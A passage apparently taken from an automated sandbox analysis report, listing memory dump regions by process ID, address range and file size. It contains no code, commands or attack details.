                                                                                                                              • memory/3004-230-0x00000000001F0000-0x00000000001F1000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/3004-224-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/3028-279-0x0000000000400000-0x00000000016BD000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                18.7MB

                                                                                                                              • memory/3028-178-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/3028-277-0x00000000017A0000-0x00000000017A9000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                36KB

                                                                                                                              • memory/3060-311-0x00000000005E0000-0x00000000005F6000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                88KB

                                                                                                                              • memory/3132-183-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/3204-158-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/3552-161-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/3556-154-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/3692-187-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/3804-661-0x0000000000400000-0x0000000002BA6000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                39.6MB

                                                                                                                              • memory/3804-660-0x0000000004840000-0x00000000048C3000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                524KB

                                                                                                                              • memory/3924-357-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/3928-318-0x000001B157380000-0x000001B1573CD000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                308KB

                                                                                                                              • memory/3928-300-0x000001B157140000-0x000001B157142000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                8KB

                                                                                                                              • memory/3928-302-0x000001B157140000-0x000001B157142000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                8KB

                                                                                                                              • memory/3928-321-0x000001B157650000-0x000001B1576C2000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                456KB

                                                                                                                              • memory/3980-156-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4068-653-0x00000000020F0000-0x0000000002134000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                272KB

                                                                                                                              • memory/4068-652-0x0000000000490000-0x00000000004B7000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                156KB

                                                                                                                              • memory/4068-654-0x0000000000400000-0x000000000045E000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                376KB

                                                                                                                              • memory/4092-396-0x0000000004C10000-0x0000000004CBB000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                684KB

                                                                                                                              • memory/4092-371-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4092-395-0x0000000004A80000-0x0000000004B5F000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                892KB

                                                                                                                              • memory/4180-242-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4192-243-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4240-308-0x000001FA2D7B0000-0x000001FA2D7B2000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                8KB

                                                                                                                              • memory/4240-310-0x000001FA2D7B0000-0x000001FA2D7B2000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                8KB

                                                                                                                              • memory/4240-313-0x000001FA2D900000-0x000001FA2D972000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                456KB

                                                                                                                              • memory/4240-303-0x00007FF680254060-mapping.dmp
                                                                                                                              • memory/4240-480-0x000001FA2D7E0000-0x000001FA2D7FB000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                108KB

                                                                                                                              • memory/4240-481-0x000001FA30200000-0x000001FA30305000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                1.0MB

                                                                                                                              • memory/4352-365-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4356-250-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4476-257-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4528-289-0x000000000041B23A-mapping.dmp
                                                                                                                              • memory/4528-315-0x00000000051A0000-0x00000000057A6000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                6.0MB

                                                                                                                              • memory/4528-285-0x0000000000400000-0x0000000000422000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                136KB

                                                                                                                              • memory/4576-275-0x0000000002E30000-0x0000000002E31000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4576-269-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4576-272-0x0000000002E30000-0x0000000002E31000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4584-398-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4592-270-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4700-397-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4756-339-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4756-280-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4824-284-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4844-283-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4880-287-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4916-288-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4916-305-0x000000000431B000-0x000000000441C000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                1.0MB

                                                                                                                              • memory/4916-307-0x0000000002AE0000-0x0000000002B3D000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                372KB

                                                                                                                              • memory/4948-358-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4976-356-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4980-390-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5040-331-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5052-359-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5092-293-0x0000000000000000-mapping.dmp